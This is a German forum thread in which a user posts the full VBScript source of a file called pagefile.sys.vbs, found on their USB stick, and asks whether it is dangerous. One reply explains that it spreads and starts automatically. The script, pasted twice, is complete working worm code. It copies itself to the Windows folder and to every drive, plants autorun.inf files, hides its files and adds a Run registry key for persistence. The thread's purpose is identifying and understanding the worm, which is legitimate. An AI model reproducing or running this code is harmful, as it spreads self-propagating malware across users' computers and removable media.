Gruppen
- Top Gruppen
- Betriebsysteme
- Windows classik
- Linux
- BS-Sonstige
- Software
- Datenbanken
- Bildbearbeitung
- Audio/mp3/Video
- Security/Viren
- SW-Sonstige
- Hardware
- Mainboard/CPU
- Grafikkarten
- Peripherie
- Laptop/Notebook
- HW-Sonstiges
- Netzwerk
- Telefon,ISDN,Modem
- W-Lan
- NW-Sonstiges
- Programmierung
- PHP,ASP,Perl...
- Java,C++...
- Webseiten/HTML
- Sonstiges
- PC-Sonstiges
- Plauderecke
- SN Intern
- Test
/ Forum / Skripte(PHP,ASP,Perl...)
Skripte(PHP,ASP,Perl...)
Fragevon AlexSoSo vom 18.07.2021, 06:00 Options
VBS-Wurm ??
Hallo ich habe gerade auf meinem USB Stick (war öffters auf reisen) eine verdächtige Dateie gefunden:
pagefile.sys.vbs
Inhalt:
================
'kuciapka tu byl
on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
set kfs=createobject("Scripting.FileSystemObject")
set kmf=kfs.getfile(Wscript.ScriptFullname)
dim text,size
size=kmf.size
check=kmf.drive.drivetype
set text=kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf
loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next
set rgpath=createobject("WScript.Shell")
rgpath.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
================================
Meine Annahme ist dass das Skript nur mit entsprechender autorun und z.B. der Wscript.exe oder anderer Schaden verursachen kann.
Tatsächlich waren keine anderen derartigen Dateien auf dem Stick.
Weiß jemand ob trotzdem eine gefahr besteht ?
Vielen Dank schonmal für eure Antworten
pagefile.sys.vbs
Inhalt:
================
'kuciapka tu byl
on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
set kfs=createobject("Scripting.FileSystemObject")
set kmf=kfs.getfile(Wscript.ScriptFullname)
dim text,size
size=kmf.size
check=kmf.drive.drivetype
set text=kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf
loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next
set rgpath=createobject("WScript.Shell")
rgpath.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
================================
Meine Annahme ist dass das Skript nur mit entsprechender autorun und z.B. der Wscript.exe oder anderer Schaden verursachen kann.
Tatsächlich waren keine anderen derartigen Dateien auf dem Stick.
Weiß jemand ob trotzdem eine gefahr besteht ?
Vielen Dank schonmal für eure Antworten
Antwort 1 von son_quatsch vom 20.07.2021, 09:45 Options
Das Skript (wenn einmal ausgeführt) verbreitet sich auf weitere Orte und wird auch mit jedem Windows-Start aktiv. Etwas anderes passiert jedoch nicht, bzw. frage ich mich nach dem Nutzen dieser Aktion...
Ähnliche Themen
.vbs in .bat konvertieren
shorty066 03.09.2008 - 54 Hits - 7 Antworten
JSON mit VBS parsen
Joshuan 13.11.2008 - 31 Hits - 2 Antworten
Fenster schließen mit VBS
Juergen52 09.05.2009 - 587 Hits - 10 Antworten
Skript geht in VBS aber nicht als HTA
CreeTar1981 12.05.2009 - 267 Hits - 1 Antwort
VBS alive Anzeige
jb090979 15.06.2009 - 379 Hits - 3 Antworten
Hinweis
Diese Frage ist schon etwas älter, Sie können daher nicht mehr auf sie antworten. Sollte Ihre Frage noch nicht gelöst sein, stellen Sie einfach eine neue Frage im Forum..
Neue Einträge
